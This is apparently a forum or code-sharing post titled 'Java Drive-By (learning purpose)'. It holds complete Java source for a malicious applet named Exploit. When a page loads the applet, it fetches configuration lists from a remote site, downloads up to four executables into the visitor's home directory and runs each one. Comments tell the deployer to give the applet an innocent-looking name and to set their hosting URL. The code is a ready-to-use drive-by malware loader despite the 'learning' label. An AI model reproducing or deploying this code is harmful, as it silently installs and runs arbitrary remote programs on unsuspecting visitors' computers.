| Java Drive-By(learning purpose) |
Code
import java.applet.Applet;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLConnection;
import java.security.AccessControlException;
import java.util.ArrayList;
//
//Change Example to what you want users to see as your Applet Name
@SuppressWarnings("serial")
public class Exploit extends Applet{
//Same here
public Exploit(){
}
public String getContents(File aFile) {
StringBuilder contents = new StringBuilder();
try {
BufferedReader input = new BufferedReader(new FileReader(aFile));
try {
String line = null; //not declared within while loop
while (( line = input.readLine()) != null){
contents.append(line);
contents.append(System.getProperty("line.separator"));
}
}
finally {
input.close();
}
}
catch (IOException ex){
ex.printStackTrace();
}
return contents.toString();
}
public String getConfig(String link){
try {
URLConnection url = null;
BufferedReader in = null;
url = new URL(link).openConnection();
in = new BufferedReader(new InputStreamReader(url.getInputStream()));
String str = in.readLine();
if (in != null) {
in.close();
}
return str;
} catch (final IOException e) {
}
return null;
}
public ArrayList<String> getConfigArray(String link){
URLConnection url = null;
String line;
ArrayList<String> file = new ArrayList<String>();
try {
url = new URL(link).openConnection();
BufferedReader in = new BufferedReader(new InputStreamReader(url.getInputStream()));
while ((line = in.readLine()) != null)
file.add(line);
if (in != null) {
in.close();
}
return file;
} catch (final IOException e) {
}
return null;
}
public ArrayList<String> loadFile(String fileName)
{
if ((fileName == null) || (fileName == ""))
throw new IllegalArgumentException();
String line;
ArrayList<String> file = new ArrayList<String>();
try
{
BufferedReader in = new BufferedReader(new FileReader(fileName));
if (!in.ready())
throw new IOException();
while ((line = in.readLine()) != null)
file.add(line);
in.close();
}
catch (IOException e)
{
System.out.println(e);
return null;
}
return file;
}
//Main Method
public void start() throws AccessControlException{
String userdir = System.getProperty("user.home");
String configs = "config.ini";
String urlss = "urls.ini";
String filess = "files.ini";
//FULL PATH TO YOUR WEBSITE HERE(WERE JAR IS GOING TO BE PALCED)\\
String mainURL = "http://site.com/";
///////////////////////////////////////////////////Do not touch anything below\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
//try{
//////////////////////////////////FILE 1//////////////////////////////////
if(getConfig(mainURL+configs).contains("1") || getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){
String fname = "\\"+getConfigArray(mainURL+filess).get(0);
String fpath = userdir.concat(fname);
final String locationDownload = getConfigArray(mainURL+urlss).get(0);
download(locationDownload, fpath);
final Runtime run = Runtime.getRuntime();
try {
run.exec(fpath);
} catch (final IOException e) {
}
}
//////////////////////////////////FILE 2//////////////////////////////////
if(getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){
String fname2 = "\\"+getConfigArray(mainURL+filess).get(1);
final Runtime run = Runtime.getRuntime();
String fpath2 = userdir.concat(fname2);
final String locationDownload2 = getConfigArray(mainURL+urlss).get(1);
download(locationDownload2, fpath2);
try {
run.exec(fpath2);
} catch (final IOException e){
}
}
//////////////////////////////////FILE 3/////////////////////////////////
if(getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){
String fname3 = "\\"+getConfigArray(mainURL+filess).get(2);
final Runtime run = Runtime.getRuntime();
String fpath3 = userdir.concat(fname3);
final String locationDownload3 = getConfigArray(mainURL+urlss).get(2);
download(locationDownload3, fpath3);
try {
run.exec(fpath3);
} catch (final IOException e){
}
}
/////////////////////////////////FILE 4//////////////////////////////////
if(getConfig(mainURL+configs).contains("4")){
String fname4 = "\\"+getConfigArray(mainURL+filess).get(3);
final Runtime run = Runtime.getRuntime();
String fpath4 = userdir.concat(fname4);
final String locationDownload3 = getConfigArray(mainURL+urlss).get(3);
download(locationDownload3, fpath4);
try {
run.exec(fpath4);
} catch (final IOException e){
}
}
////////////////////////////////END///////////////////////////////////
//}catch (AccessControlException e){
// System.out.println("hi");
// }
}
public void download(final String address, final String localFileName) {
OutputStream out = null;
URLConnection conn = null;
InputStream in = null;
try {
final URL url = new URL(address);
out = new BufferedOutputStream(new FileOutputStream(localFileName));
conn = url.openConnection();
in = conn.getInputStream();
final byte[] buffer = new byte[1024];
int numRead;
while ((numRead = in.read(buffer)) != -1) {
out.write(buffer, 0, numRead);
}
} catch (final Exception exception) {
} finally {
try {
if (in != null) {
in.close();
}
if (out != null) {
out.close();
}
} catch (final IOException ioe) {
}
}
}
public void main(String args[]){
start();
}
public void stop(){
}
}
Please Login to Post a Comment.
Rating is available to Members only.
Please login or register to vote.
Please login or register to vote.
No Ratings have been Posted.
